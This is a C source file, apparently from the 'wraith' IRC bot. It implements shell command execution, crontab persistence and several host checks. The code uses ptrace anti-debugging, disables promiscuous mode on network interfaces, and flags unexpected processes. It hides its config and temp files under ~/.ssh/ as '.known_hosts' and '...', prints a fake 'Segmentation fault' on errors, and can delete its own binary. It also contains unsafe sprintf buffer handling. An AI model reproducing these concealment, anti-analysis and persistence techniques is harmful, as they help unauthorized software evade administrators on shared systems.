shell.c 26 KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051061071081091101111121131141151161171181191201211221231241251261271281291301311321331341351361371381391401411421431441451461471481491501511521531541551561571581591601611621631641651661671681691701711721731741751761771781791801811821831841851861871881891901911921931941951961971981992002012022032042052062072082092102112122132142152162172182192202212222232242252262272282292302312322332342352362372382392402412422432442452462472482492502512522532542552562572582592602612622632642652662672682692702712722732742752762772782792802812822832842852862872882892902912922932942952962972982993003013023033043053063073083093103113123133143153163173183193203213223233243253263273283293303313323333343353363373383393403413423433443453463473483493503513523533543553563573583593603613623633643653663673683693703713723733743753763773783793803813823833843853863873883893903913923933943953963973983994004014024034044054064074084094104114124134144154164174184194204214224234244254264274284294304314324334344354364374384394404414424434444454464474484494504514524534544554564574584594604614624634644654664674684694704714724734744754764774784794804814824834844854864874884894904914924934944954964974984995005015025035045055065075085095105115125135145155165175185195205215225235245255265275285295305315325335345355365375385395405415425435445455465475485495505515525535545555565575585595605615625635645655665675685695705715725735745755765775785795805815825835845855865875885895905915925935945955965975985996006016026036046056066076086096106116126136146156166176186196206216226236246256266276286296306316326336346356366376386396406416426436446456466476486496506516526536546556566576586596606616626636646656666676686696706716726736746756766776786796806816826836846856866876886896906916926936946956966976986997007017027037047057067077087097107117127137147157167177187197207217227237247257267277287297307317327337347357367377387397407417427437447457467477487497507517527537547557567577587597607617627637647657667677687697707717727737747757767777787797807817827837847857867877887897907917927937947957967977987998008018028038048058068078088098108118128138148158168178188198208218228238248258268278288298308318328338348358368378388398408418428438448458468478488498508518528538548558568578588598608618628638648658668678688698708718728738748758768778788798808818828838848858868878888898908918928938948958968978988999009019029039049059069079089099109119129139149159169179189199209219229239249259269279289299309319329339349359369379389399409419429439449459469479489499509519529539549559569579589599609619629639649659669679689699709719729739749759769779789799809819829839849859869879889899909919929939949959969979989991000100110021003100410051006100710081009101010111012101310141015101610171018101910201021102210231024102510261027102810291030103110321033
  1. /*
  2. * shell.c -- handles:
  3. *
  4. * All shell related functions
  5. * -shell_exec()
  6. * -botconfig parsing
  7. * -check_*()
  8. * -crontab functions
  9. *
  10. */
  11. #include "common.h"
  12. #include "shell.h"
  13. #include "cfg.h"
  14. #include "settings.h"
  15. #include "userrec.h"
  16. #include "flags.h"
  17. #include "tandem.h"
  18. #include "main.h"
  19. #include "dccutil.h"
  20. #include "misc.h"
  21. #include "misc_file.h"
  22. #include "bg.h"
  23. #include "stat.h"
  24. #include "users.h"
  25. #ifdef LEAF
  26. #include "src/mod/server.mod/server.h"
  27. #endif /* LEAF */
  28. #include <sys/types.h>
  29. #include <pwd.h>
  30. #include <signal.h>
  31. #ifdef S_ANTITRACE
  32. # ifndef CYGWIN_HACKS
  33. # include <sys/ptrace.h>
  34. # endif /* !CYGWIN_HACKS */
  35. #include <sys/wait.h>
  36. #endif /* S_ANTITRACE */
  37. #include <sys/utsname.h>
  38. #include <pwd.h>
  39. #include <errno.h>
  40. #include <net/if.h>
  41. #include <sys/ioctl.h>
  42. #include <sys/socket.h>
  43. #include <ctype.h>
  44. #include <fcntl.h>
  45. #include <sys/stat.h>
  46. #include <unistd.h>
  47. #include <dirent.h>
  48. int clear_tmp()
  49. {
  50. DIR *tmp = NULL;
  51. struct dirent *dir_ent = NULL;
  52. if (!(tmp = opendir(tempdir))) return 1;
  53. while ((dir_ent = readdir(tmp))) {
  54. if (strncmp(dir_ent->d_name, ".pid.", 4) && strncmp(dir_ent->d_name, ".u", 2) && strcmp(dir_ent->d_name, ".bin.old")
  55. && strcmp(dir_ent->d_name, ".") && strcmp(dir_ent->d_name, ".un") && strcmp(dir_ent->d_name, "..")) {
  56. char *file = NULL;
  57. file = calloc(1, strlen(dir_ent->d_name) + strlen(tempdir) + 1);
  58. strcat(file, tempdir);
  59. strcat(file, dir_ent->d_name);
  60. file[strlen(file)] = 0;
  61. sdprintf("clear_tmp: %s", file);
  62. unlink(file);
  63. free(file);
  64. }
  65. }
  66. closedir(tmp);
  67. return 0;
  68. }
  69. #ifdef LEAF
  70. void check_mypid()
  71. {
  72. if (can_stat(conf.bot->pid_file) && (getpid() != checkpid(conf.bot->nick, NULL))) {
  73. fatal(STR("getpid() does not match pid in file. Possible cloned process, exiting.."), 1);
  74. nuke_server("Cloned Process...");
  75. botnet_send_bye();
  76. exit(1);
  77. }
  78. }
  79. #endif /* LEAF */
  80. #ifndef CYGWIN_HACKS
  81. #ifdef S_LASTCHECK
  82. char last_buf[128] = "";
  83. #endif /* S_LASTCHECK */
  84. void check_last() {
  85. #ifdef S_LASTCHECK
  86. if (!strcmp((char *) CFG_LOGIN.ldata ? CFG_LOGIN.ldata : CFG_LOGIN.gdata ? CFG_LOGIN.gdata : "ignore", "ignore"))
  87. return;
  88. if (conf.username) {
  89. char *out = NULL, buf[50] = "";
  90. sprintf(buf, "last %s", conf.username);
  91. if (shell_exec(buf, NULL, &out, NULL)) {
  92. if (out) {
  93. char *p = NULL;
  94. p = strchr(out, '\n');
  95. if (p)
  96. *p = 0;
  97. if (strlen(out) > 10) {
  98. if (last_buf[0]) {
  99. if (strncmp(last_buf, out, sizeof(last_buf))) {
  100. char *work = NULL;
  101. work = calloc(1, strlen(out) + 7 + 2 + 1);
  102. sprintf(work, "Login: %s", out);
  103. detected(DETECT_LOGIN, work);
  104. free(work);
  105. }
  106. }
  107. strncpyz(last_buf, out, sizeof(last_buf));
  108. }
  109. free(out);
  110. }
  111. }
  112. }
  113. #endif /* S_LASTCHECK */
  114. }
  115. void check_processes()
  116. {
  117. #ifdef S_PROCESSCHECK
  118. char *proclist = NULL, *out = NULL, *p = NULL, *np = NULL, *curp = NULL, buf[1024] = "", bin[128] = "";
  119. if (!strcmp((char *) CFG_BADPROCESS.ldata ? CFG_BADPROCESS.ldata : CFG_BADPROCESS.gdata ? CFG_BADPROCESS.gdata : "ignore", "ignore"))
  120. return;
  121. proclist = (char *) (CFG_PROCESSLIST.ldata && ((char *) CFG_PROCESSLIST.ldata)[0] ?
  122. CFG_PROCESSLIST.ldata : CFG_PROCESSLIST.gdata && ((char *) CFG_PROCESSLIST.gdata)[0] ? CFG_PROCESSLIST.gdata : NULL);
  123. if (!proclist)
  124. return;
  125. if (!shell_exec("ps x", NULL, &out, NULL))
  126. return;
  127. /* Get this binary's filename */
  128. strncpyz(buf, binname, sizeof(buf));
  129. p = strrchr(buf, '/');
  130. if (p) {
  131. p++;
  132. strncpyz(bin, p, sizeof(bin));
  133. } else {
  134. bin[0] = 0;
  135. }
  136. /* Fix up the "permitted processes" list */
  137. p = calloc(1, strlen(proclist) + strlen(bin) + 6);
  138. strcpy(p, proclist);
  139. strcat(p, " ");
  140. strcat(p, bin);
  141. strcat(p, " ");
  142. proclist = p;
  143. curp = out;
  144. while (curp) {
  145. np = strchr(curp, '\n');
  146. if (np)
  147. *np++ = 0;
  148. if (atoi(curp) > 0) {
  149. char *pid = NULL, *tty = NULL, *stat = NULL, *time = NULL, cmd[512] = "", line[2048] = "";
  150. strncpyz(line, curp, sizeof(line));
  151. /* it's a process line */
  152. /* Assuming format: pid tty stat time cmd */
  153. pid = newsplit(&curp);
  154. tty = newsplit(&curp);
  155. stat = newsplit(&curp);
  156. time = newsplit(&curp);
  157. strncpyz(cmd, curp, sizeof(cmd));
  158. /* skip any <defunct> procs "/bin/sh -c" crontab stuff and binname crontab stuff */
  159. if (!strstr(cmd, "<defunct>") && !strncmp(cmd, "/bin/sh -c", 10) && !strncmp(cmd, binname, strlen(binname))) {
  160. /* get rid of any args */
  161. if ((p = strchr(cmd, ' ')))
  162. *p = 0;
  163. /* remove [] or () */
  164. if (strlen(cmd)) {
  165. p = cmd + strlen(cmd) - 1;
  166. if (((cmd[0] == '(') && (*p == ')')) || ((cmd[0] == '[') && (*p == ']'))) {
  167. *p = 0;
  168. strcpy(buf, cmd + 1);
  169. strcpy(cmd, buf);
  170. }
  171. }
  172. /* remove path */
  173. if ((p = strrchr(cmd, '/'))) {
  174. p++;
  175. strcpy(buf, p);
  176. strcpy(cmd, buf);
  177. }
  178. /* skip "ps" */
  179. if (strcmp(cmd, "ps")) {
  180. /* see if proc's in permitted list */
  181. strcat(cmd, " ");
  182. if ((p = strstr(proclist, cmd))) {
  183. /* Remove from permitted list */
  184. while (*p != ' ')
  185. *p++ = 1;
  186. } else {
  187. char *work = NULL;
  188. size_t size = 0;
  189. size = strlen(line) + 22;
  190. work = calloc(1, size);
  191. egg_snprintf(work, size, "Unexpected process: %s", line);
  192. detected(DETECT_PROCESS, work);
  193. free(work);
  194. }
  195. }
  196. }
  197. }
  198. curp = np;
  199. }
  200. free(proclist);
  201. if (out)
  202. free(out);
  203. #endif /* S_PROCESSCHECK */
  204. }
  205. #endif /* !CYGWIN_HACKS */
  206. void check_promisc()
  207. {
  208. #ifdef S_PROMISC
  209. #ifdef SIOCGIFCONF
  210. struct ifconf ifcnf;
  211. char *reqp = NULL, *end_req = NULL, buf[1024] = "";
  212. int sock;
  213. if (!strcmp((char *) CFG_PROMISC.ldata ? CFG_PROMISC.ldata : CFG_PROMISC.gdata ? CFG_PROMISC.gdata : "ignore", "ignore"))
  214. return;
  215. sock = socket(AF_INET, SOCK_DGRAM, 0);
  216. if (sock < 0)
  217. return;
  218. ifcnf.ifc_len = sizeof(buf);
  219. ifcnf.ifc_buf = buf;
  220. if (ioctl(sock, SIOCGIFCONF, &ifcnf) < 0) {
  221. close(sock);
  222. return;
  223. }
  224. reqp = buf; /* pointer to start of array */
  225. end_req = buf + ifcnf.ifc_len; /* pointer to end of array */
  226. while (reqp < end_req) {
  227. struct ifreq ifreq, *ifr = NULL;
  228. ifr = (struct ifreq *) reqp; /* start examining interface */
  229. ifreq = *ifr;
  230. if (!ioctl(sock, SIOCGIFFLAGS, &ifreq)) { /* we can read this interface! */
  231. /* sdprintf("Examing interface: %s", ifr->ifr_name); */
  232. if (ifreq.ifr_flags & IFF_PROMISC) {
  233. char which[101] = "";
  234. egg_snprintf(which, sizeof(which), "Detected promiscuous mode on interface: %s", ifr->ifr_name);
  235. /* this turns it off, not likely to *ever* happen though :P */
  236. ifreq.ifr_flags &= ~(IFF_PROMISC);
  237. ioctl(sock, SIOCSIFFLAGS, &ifreq); /* set flags */
  238. close(sock);
  239. detected(DETECT_PROMISC, which);
  240. return;
  241. }
  242. }
  243. /* move pointer to next array element (next interface) */
  244. reqp += sizeof(ifr->ifr_name) + sizeof(ifr->ifr_addr);
  245. }
  246. close(sock);
  247. #endif /* SIOCGIFCONF */
  248. #endif /* S_PROMISC */
  249. }
  250. #ifdef S_ANTITRACE
  251. int traced = 0;
  252. static void got_sigtrap(int z)
  253. {
  254. traced = 0;
  255. }
  256. #endif /* S_ANTITRACE */
  257. void check_trace(int start)
  258. {
  259. #ifdef S_ANTITRACE
  260. int x, parent, i;
  261. if (!strcmp((char *) CFG_TRACE.ldata ? CFG_TRACE.ldata : CFG_TRACE.gdata ? CFG_TRACE.gdata : "ignore", "ignore"))
  262. return;
  263. parent = getpid();
  264. #ifdef __linux__
  265. /* we send ourselves a SIGTRAP, if we recieve, we're not being traced, otherwise we are. */
  266. signal(SIGTRAP, got_sigtrap);
  267. traced = 1;
  268. raise(SIGTRAP);
  269. /* no longer need this__asm__("INT3"); //SIGTRAP */
  270. signal(SIGTRAP, SIG_DFL);
  271. if (traced) {
  272. if (start) {
  273. #ifdef S_MESSUPTERM
  274. messup_term();
  275. #else
  276. kill(parent, SIGKILL);
  277. exit(1);
  278. #endif /* S_MESSUPTERM */
  279. } else
  280. detected(DETECT_TRACE, "I'm being traced!");
  281. } else {
  282. x = fork();
  283. if (x == -1)
  284. return;
  285. else if (x == 0) {
  286. i = ptrace(PTRACE_ATTACH, parent, 0, 0);
  287. if (i == (-1) && errno == EPERM) {
  288. if (start) {
  289. #ifdef S_MESSUPTERM
  290. messup_term();
  291. #else
  292. kill(parent, SIGKILL);
  293. exit(1);
  294. #endif /* S_MESSUPTERM */
  295. } else
  296. detected(DETECT_TRACE, "I'm being traced!");
  297. } else {
  298. waitpid(parent, &i, 0);
  299. kill(parent, SIGCHLD);
  300. ptrace(PTRACE_DETACH, parent, 0, 0);
  301. kill(parent, SIGCHLD);
  302. }
  303. exit(0);
  304. } else
  305. wait(&i);
  306. }
  307. #endif /* __linux__ */
  308. #ifdef BSD
  309. x = fork();
  310. if (x == -1)
  311. return;
  312. else if (x == 0) {
  313. i = ptrace(PT_ATTACH, parent, 0, 0);
  314. if (i == (-1) && errno == EBUSY) {
  315. if (start) {
  316. #ifdef S_MESSUPTERM
  317. messup_term();
  318. #else
  319. kill(parent, SIGKILL);
  320. exit(1);
  321. #endif /* S_MESSUPTERM */
  322. } else
  323. detected(DETECT_TRACE, "I'm being traced");
  324. } else {
  325. wait(&i);
  326. i = ptrace(PT_CONTINUE, parent, (caddr_t) 1, 0);
  327. kill(parent, SIGCHLD);
  328. wait(&i);
  329. i = ptrace(PT_DETACH, parent, (caddr_t) 1, 0);
  330. wait(&i);
  331. }
  332. exit(0);
  333. } else
  334. waitpid(x, NULL, 0);
  335. #endif /* BSD */
  336. #endif /* S_ANTITRACE */
  337. }
  338. int shell_exec(char *cmdline, char *input, char **output, char **erroutput)
  339. {
  340. FILE *inpFile = NULL, *outFile = NULL, *errFile = NULL;
  341. char tmpFile[161] = "";
  342. int x, fd;
  343. int parent = getpid();
  344. if (!cmdline)
  345. return 0;
  346. /* Set up temp files */
  347. /* always use mkstemp() when handling temp filess! -dizz */
  348. sprintf(tmpFile, "%s.in-XXXXXX", tempdir);
  349. if ((fd = mkstemp(tmpFile)) == -1 || (inpFile = fdopen(fd, "w+")) == NULL) {
  350. if (fd != -1) {
  351. unlink(tmpFile);
  352. close(fd);
  353. }
  354. putlog(LOG_ERRORS, "*" , "exec: Couldn't open '%s': %s", tmpFile, strerror(errno));
  355. return 0;
  356. }
  357. unlink(tmpFile);
  358. if (input) {
  359. if (fwrite(input, strlen(input), 1, inpFile) != 1) {
  360. fclose(inpFile);
  361. putlog(LOG_ERRORS, "*", "exec: Couldn't write to '%s': %s", tmpFile, strerror(errno));
  362. return 0;
  363. }
  364. fseek(inpFile, 0, SEEK_SET);
  365. }
  366. unlink(tmpFile);
  367. sprintf(tmpFile, "%s.err-XXXXXX", tempdir);
  368. if ((fd = mkstemp(tmpFile)) == -1 || (errFile = fdopen(fd, "w+")) == NULL) {
  369. if (fd != -1) {
  370. unlink(tmpFile);
  371. close(fd);
  372. }
  373. putlog(LOG_ERRORS, "*", "exec: Couldn't open '%s': %s", tmpFile, strerror(errno));
  374. return 0;
  375. }
  376. unlink(tmpFile);
  377. sprintf(tmpFile, "%s.out-XXXXXX", tempdir);
  378. if ((fd = mkstemp(tmpFile)) == -1 || (outFile = fdopen(fd, "w+")) == NULL) {
  379. if (fd != -1) {
  380. unlink(tmpFile);
  381. close(fd);
  382. }
  383. putlog(LOG_ERRORS, "*", "exec: Couldn't open '%s': %s", tmpFile, strerror(errno));
  384. return 0;
  385. }
  386. unlink(tmpFile);
  387. x = fork();
  388. if (x == -1) {
  389. putlog(LOG_ERRORS, "*", "exec: fork() failed: %s", strerror(errno));
  390. fclose(inpFile);
  391. fclose(errFile);
  392. fclose(outFile);
  393. return 0;
  394. }
  395. if (x) {
  396. /* Parent: wait for the child to complete */
  397. int st = 0;
  398. waitpid(x, &st, 0);
  399. /* Now read the files into the buffers */
  400. fclose(inpFile);
  401. fflush(outFile);
  402. fflush(errFile);
  403. if (erroutput) {
  404. char *buf = NULL;
  405. int fs;
  406. fseek(errFile, 0, SEEK_END);
  407. fs = ftell(errFile);
  408. if (fs == 0) {
  409. (*erroutput) = NULL;
  410. } else {
  411. buf = calloc(1, fs + 1);
  412. fseek(errFile, 0, SEEK_SET);
  413. fread(buf, 1, fs, errFile);
  414. buf[fs] = 0;
  415. (*erroutput) = buf;
  416. }
  417. }
  418. fclose(errFile);
  419. if (output) {
  420. char *buf;
  421. int fs;
  422. fseek(outFile, 0, SEEK_END);
  423. fs = ftell(outFile);
  424. if (fs == 0) {
  425. (*output) = NULL;
  426. } else {
  427. buf = calloc(1, fs + 1);
  428. fseek(outFile, 0, SEEK_SET);
  429. fread(buf, 1, fs, outFile);
  430. buf[fs] = 0;
  431. (*output) = buf;
  432. }
  433. }
  434. fclose(outFile);
  435. return 1;
  436. } else {
  437. /* Child: make fd's and set them up as std* */
  438. int ind, outd, errd;
  439. char *argv[4] = { NULL, NULL, NULL, NULL };
  440. ind = fileno(inpFile);
  441. outd = fileno(outFile);
  442. errd = fileno(errFile);
  443. if (dup2(ind, STDIN_FILENO) == (-1)) {
  444. kill(parent, SIGCHLD);
  445. exit(1);
  446. }
  447. if (dup2(outd, STDOUT_FILENO) == (-1)) {
  448. kill(parent, SIGCHLD);
  449. exit(1);
  450. }
  451. if (dup2(errd, STDERR_FILENO) == (-1)) {
  452. kill(parent, SIGCHLD);
  453. exit(1);
  454. }
  455. argv[0] = "sh";
  456. argv[1] = "-c";
  457. argv[2] = cmdline;
  458. argv[3] = NULL;
  459. execvp(argv[0], &argv[0]);
  460. kill(parent, SIGCHLD);
  461. exit(1);
  462. }
  463. }
  464. void detected(int code, char *msg)
  465. {
  466. char *p = NULL, tmp[512] = "";
  467. struct userrec *u = NULL;
  468. struct flag_record fr = { FR_GLOBAL, 0, 0};
  469. int act;
  470. u = get_user_by_handle(userlist, conf.bot->nick);
  471. #ifdef S_LASTCHECK
  472. if (code == DETECT_LOGIN)
  473. p = (char *) (CFG_LOGIN.ldata ? CFG_LOGIN.ldata : (CFG_LOGIN.gdata ? CFG_LOGIN.gdata : NULL));
  474. #endif /* S_LASTCHECK */
  475. #ifdef S_ANTITRACE
  476. if (code == DETECT_TRACE)
  477. p = (char *) (CFG_TRACE.ldata ? CFG_TRACE.ldata : (CFG_TRACE.gdata ? CFG_TRACE.gdata : NULL));
  478. #endif /* S_ANTITRACE */
  479. #ifdef S_PROMISC
  480. if (code == DETECT_PROMISC)
  481. p = (char *) (CFG_PROMISC.ldata ? CFG_PROMISC.ldata : (CFG_PROMISC.gdata ? CFG_PROMISC.gdata : NULL));
  482. #endif /* S_PROMISC */
  483. #ifdef S_PROCESSCHECK
  484. if (code == DETECT_PROCESS)
  485. p = (char *) (CFG_BADPROCESS.ldata ? CFG_BADPROCESS.ldata : (CFG_BADPROCESS.gdata ? CFG_BADPROCESS.gdata : NULL));
  486. #endif /* S_PROMISC */
  487. #ifdef S_HIJACKCHECK
  488. if (code == DETECT_SIGCONT)
  489. p = (char *) (CFG_HIJACK.ldata ? CFG_HIJACK.ldata : (CFG_HIJACK.gdata ? CFG_HIJACK.gdata : NULL));
  490. #endif /* S_PROMISC */
  491. if (!p)
  492. act = DET_WARN;
  493. else if (!strcmp(p, "die"))
  494. act = DET_DIE;
  495. else if (!strcmp(p, "reject"))
  496. act = DET_REJECT;
  497. else if (!strcmp(p, "suicide"))
  498. act = DET_SUICIDE;
  499. else if (!strcmp(p, "ignore"))
  500. act = DET_IGNORE;
  501. else
  502. act = DET_WARN;
  503. switch (act) {
  504. case DET_IGNORE:
  505. break;
  506. case DET_WARN:
  507. putlog(LOG_WARN, "*", msg);
  508. break;
  509. case DET_REJECT:
  510. do_fork();
  511. putlog(LOG_WARN, "*", "Setting myself +d: %s", msg);
  512. sprintf(tmp, "+d: %s", msg);
  513. set_user(&USERENTRY_COMMENT, u, tmp);
  514. fr.global = USER_DEOP;
  515. fr.bot = 1;
  516. set_user_flagrec(u, &fr, 0);
  517. sleep(1);
  518. break;
  519. case DET_DIE:
  520. putlog(LOG_WARN, "*", "Dying: %s", msg);
  521. sprintf(tmp, "Dying: %s", msg);
  522. set_user(&USERENTRY_COMMENT, u, tmp);
  523. #ifdef LEAF
  524. nuke_server("BBL");
  525. #endif /* LEAF */
  526. sleep(1);
  527. fatal(msg, 0);
  528. break;
  529. case DET_SUICIDE:
  530. putlog(LOG_WARN, "*", "Comitting suicide: %s", msg);
  531. sprintf(tmp, "Suicide: %s", msg);
  532. set_user(&USERENTRY_COMMENT, u, tmp);
  533. #ifdef LEAF
  534. nuke_server("HARAKIRI!!");
  535. #endif /* LEAF */
  536. sleep(1);
  537. unlink(binname);
  538. #ifdef HUB
  539. unlink(userfile);
  540. sprintf(tmp, "%s~", userfile);
  541. unlink(tmp);
  542. #endif /* HUB */
  543. fatal(msg, 0);
  544. break;
  545. }
  546. }
  547. char *werr_tostr(int errnum)
  548. {
  549. switch (errnum) {
  550. case ERR_BINSTAT:
  551. return "Cannot access binary";
  552. case ERR_BADPASS:
  553. return "Incorrect password";
  554. case ERR_BINMOD:
  555. return "Cannot chmod() binary";
  556. case ERR_PASSWD:
  557. return "Cannot access the global passwd file";
  558. case ERR_WRONGBINDIR:
  559. return "Wrong directory/binary name";
  560. case ERR_CONFSTAT:
  561. #ifdef LEAF
  562. return STR("Cannot access config directory (~/.ssh/)");
  563. #else
  564. return "Cannot access config directory (./)";
  565. #endif /* LEAF */
  566. case ERR_TMPSTAT:
  567. #ifdef LEAF
  568. return STR("Cannot access tmp directory (~/.ssh/.../)");
  569. #else
  570. return STR("Cannot access config directory (./tmp/)");
  571. #endif /* LEAF */
  572. case ERR_CONFDIRMOD:
  573. #ifdef LEAF
  574. return STR("Cannot chmod() config directory (~/.ssh/)");
  575. #else
  576. return "Cannot chmod() config directory (./)";
  577. #endif /* LEAF */
  578. case ERR_CONFMOD:
  579. #ifdef LEAF
  580. return STR("Cannot chmod() config (~/.ssh/.known_hosts/)");
  581. #else
  582. return STR("Cannot chmod() config (./conf)");
  583. #endif /* LEAF */
  584. case ERR_TMPMOD:
  585. #ifdef LEAF
  586. return STR("Cannot chmod() tmp directory (~/.ssh/.../)");
  587. #else
  588. return STR("Cannot chmod() tmp directory (./tmp)");
  589. #endif /* LEAF */
  590. case ERR_NOCONF:
  591. #ifdef LEAF
  592. return STR("The local config is missing (~/.ssh/.known_hosts)");
  593. #else
  594. return STR("The local config is missing (./conf)");
  595. #endif /* LEAF */
  596. case ERR_CONFBADENC:
  597. return STR("Encryption in config is wrong/corrupt");
  598. case ERR_WRONGUID:
  599. return STR("UID in conf does not match geteuid()");
  600. case ERR_WRONGUNAME:
  601. return STR("Uname in conf does not match uname()");
  602. case ERR_BADCONF:
  603. return "Config file is incomplete";
  604. case ERR_BADBOT:
  605. return STR("No such botnick");
  606. case ERR_BOTDISABLED:
  607. return STR("Bot is disabled, remove '/' in config");
  608. case ERR_NOBOTS:
  609. return STR("There are no bots in the config! Please use ./binary -C to edit");
  610. default:
  611. return "Unforseen error";
  612. }
  613. }
  614. void werr(int errnum)
  615. {
  616. /* [1]+ Done ls --color=auto -A -CF
  617. [1]+ Killed bash
  618. */
  619. /*
  620. int x = 0;
  621. unsigned long job = randint(2) + 1; */
  622. /* printf("[%lu] %lu%lu%lu%lu%lu\n", job, randint(2) + 1, randint(8) + 1, randint(8) + 1, errnum); */
  623. /* printf("\n[%lu]+ Killed rm -rf /\r\n", job); */
  624. /*
  625. if (checkedpass) {
  626. printf("[%lu] %d\n", job, getpid());
  627. }
  628. */
  629. /* printf("\n[%lu]+ Stopped %s\r\n", job, basename(binname)); */
  630. sdprintf("Error %d: %s", errnum, werr_tostr(errnum));
  631. printf("*** Error code %d\n\n", errnum);
  632. printf(STR("Segmentation fault\n"));
  633. fatal("", 0);
  634. }
  635. int email(char *subject, char *msg, int who)
  636. {
  637. struct utsname un;
  638. char run[2048] = "", addrs[1024] = "";
  639. int mail = 0, sendmail = 0;
  640. FILE *f = NULL;
  641. uname(&un);
  642. if (is_file("/usr/sbin/sendmail"))
  643. sendmail++;
  644. else if (is_file("/usr/bin/mail"))
  645. mail++;
  646. else {
  647. putlog(LOG_WARN, "*", "I Have no usable mail client.");
  648. return 1;
  649. }
  650. if (who & EMAIL_OWNERS) {
  651. sprintf(addrs, "%s", replace(owneremail, ",", " "));
  652. }
  653. if (who & EMAIL_TEAM) {
  654. if (addrs[0])
  655. sprintf(addrs, "%s wraith@shatow.net", addrs);
  656. else
  657. sprintf(addrs, "wraith@shatow.net");
  658. }
  659. if (sendmail)
  660. sprintf(run, "/usr/sbin/sendmail -t");
  661. else if (mail)
  662. sprintf(run, "/usr/bin/mail %s -a \"From: %s@%s\" -s \"%s\" -a \"Content-Type: text/plain\"", addrs, conf.bot->nick ? conf.bot->nick : "none", un.nodename, subject);
  663. if ((f = popen(run, "w"))) {
  664. if (sendmail) {
  665. fprintf(f, "To: %s\n", addrs);
  666. fprintf(f, "From: %s@%s\n",
  667. conffile.bots ?
  668. (conffile.bots->nick ? conffile.bots->nick :
  669. (conffile.username ? conffile.username : "WRAITH"))
  670. : "WRAITH", un.nodename);
  671. fprintf(f, "Subject: %s\n", subject);
  672. fprintf(f, "Content-Type: text/plain\n");
  673. }
  674. fprintf(f, "%s\n", msg);
  675. if (fflush(f))
  676. return 1;
  677. if (pclose(f))
  678. return 1;
  679. } else
  680. return 1;
  681. return 0;
  682. }
  683. void baduname(char *confhas, char *myuname) {
  684. char *tmpFile = NULL;
  685. int tosend = 0, make = 0;
  686. tmpFile = calloc(1, strlen(tempdir) + 3 + 1);
  687. sprintf(tmpFile, "%s.un", tempdir);
  688. sdprintf("CHECKING %s", tmpFile);
  689. if (is_file(tmpFile)) {
  690. struct stat ss;
  691. time_t diff;
  692. stat(tmpFile, &ss);
  693. diff = now - ss.st_mtime;
  694. if (diff >= 86400) {
  695. tosend++; /* only send once a day */
  696. unlink(tmpFile); /* remove file */
  697. make++; /* make a new one at thie time. */
  698. }
  699. } else {
  700. make++;
  701. }
  702. if (make) {
  703. FILE *fp = NULL;
  704. if ((fp = fopen(tmpFile, "w"))) {
  705. fprintf(fp, "\n");
  706. fflush(fp);
  707. fclose(fp);
  708. tosend++; /* only send if we could write the file. */
  709. }
  710. }
  711. if (tosend) {
  712. struct utsname un;
  713. char msg[501] = "", subject[31] = "";
  714. uname(&un);
  715. egg_snprintf(subject, sizeof subject, "CONF/UNAME() mismatch notice");
  716. egg_snprintf(msg, sizeof msg, STR("This is an auto email from a wraith bot which has you in it's OWNER_EMAIL list..\n \nThe uname() output on this box has changed, probably due to a kernel upgrade...\nMy login is: %s\nConf : %s\nUname(): %s\n \nThis email will only be sent once a day while this error is present.\nYou need to login to my shell (%s) and fix my local config.\n"),
  717. conffile.username ? conffile.username : (conf.username ? conf.username : "unknown"),
  718. confhas, myuname, un.nodename);
  719. email(subject, msg, EMAIL_OWNERS);
  720. }
  721. free(tmpFile);
  722. }
  723. char *homedir()
  724. {
  725. static char homedir_buf[DIRMAX] = "";
  726. if (!homedir_buf || (homedir_buf && !homedir_buf[0])) {
  727. char tmp[DIRMAX] = "";
  728. if (conf.homedir)
  729. egg_snprintf(tmp, sizeof tmp, "%s", conf.homedir);
  730. else {
  731. #ifdef CYGWIN_HACKS
  732. egg_snprintf(tmp, sizeof tmp, "%s", dirname(binname));
  733. #else /* !CYGWIN_HACKS */
  734. struct passwd *pw = NULL;
  735. ContextNote("getpwuid()");
  736. pw = getpwuid(myuid);
  737. egg_snprintf(tmp, sizeof tmp, "%s", pw->pw_dir);
  738. ContextNote("getpwuid(): Success");
  739. #endif /* CYGWIN_HACKS */
  740. }
  741. ContextNote("realpath()");
  742. realpath(tmp, homedir_buf); /* this will convert lame home dirs of /home/blah->/usr/home/blah */
  743. ContextNote("realpath(): Success");
  744. }
  745. return homedir_buf;
  746. }
  747. char *my_username()
  748. {
  749. static char username[DIRMAX] = "";
  750. if (!username || (username && !username[0])) {
  751. if (conf.username)
  752. egg_snprintf(username, sizeof username, "%s", conf.username);
  753. else {
  754. #ifdef CYGWIN_HACKS
  755. egg_snprintf(username, sizeof username, "cygwin");
  756. #else /* !CYGWIN_HACKS */
  757. struct passwd *pw = NULL;
  758. ContextNote("getpwuid()");
  759. pw = getpwuid(myuid);
  760. ContextNote("getpwuid(): Success");
  761. egg_snprintf(username, sizeof username, "%s", pw->pw_name);
  762. #endif /* CYGWIN_HACKS */
  763. }
  764. }
  765. return username;
  766. }
  767. char *confdir()
  768. {
  769. static char confdir_buf[DIRMAX] = "";
  770. if (!confdir_buf || (confdir_buf && !confdir_buf[0])) {
  771. #ifdef LEAF
  772. egg_snprintf(confdir_buf, sizeof confdir_buf, "%s/.ssh", homedir());
  773. #endif /* LEAF */
  774. #ifdef HUB
  775. egg_snprintf(confdir_buf, sizeof confdir_buf, "%s", dirname(binname));
  776. #endif /* HUB */
  777. #ifdef CYGWIN_HACKS
  778. egg_snprintf(confdir_buf, sizeof confdir_buf, "%s", homedir());
  779. #endif /* CYGWIN_HACKS */
  780. }
  781. return confdir_buf;
  782. }
  783. char *my_uname()
  784. {
  785. static char os_uname[250] = "";
  786. if (!os_uname || (os_uname && !os_uname[0])) {
  787. char *unix_n = NULL, *vers_n = NULL;
  788. struct utsname un;
  789. if (uname(&un) < 0) {
  790. unix_n = "*unkown*";
  791. vers_n = "";
  792. } else {
  793. unix_n = un.nodename;
  794. #ifdef __FreeBSD__
  795. vers_n = un.release;
  796. #else /* __linux__ */
  797. vers_n = un.version;
  798. #endif /* __FreeBSD__ */
  799. }
  800. egg_snprintf(os_uname, sizeof os_uname, "%s %s", unix_n, vers_n);
  801. }
  802. return os_uname;
  803. }
  804. void check_crontab()
  805. {
  806. int i = 0;
  807. #ifdef LEAF
  808. if (!conf.bot->localhub)
  809. fatal("something is wrong.", 0);
  810. #endif /* LEAF */
  811. if (!(i = crontab_exists())) {
  812. crontab_create(5);
  813. if (!(i = crontab_exists()))
  814. printf("* Error writing crontab entry.\n");
  815. }
  816. }
  817. void crontab_del() {
  818. char *tmpFile = NULL, *p = NULL, buf[2048] = "";
  819. tmpFile = calloc(1, strlen(binname) + 100);
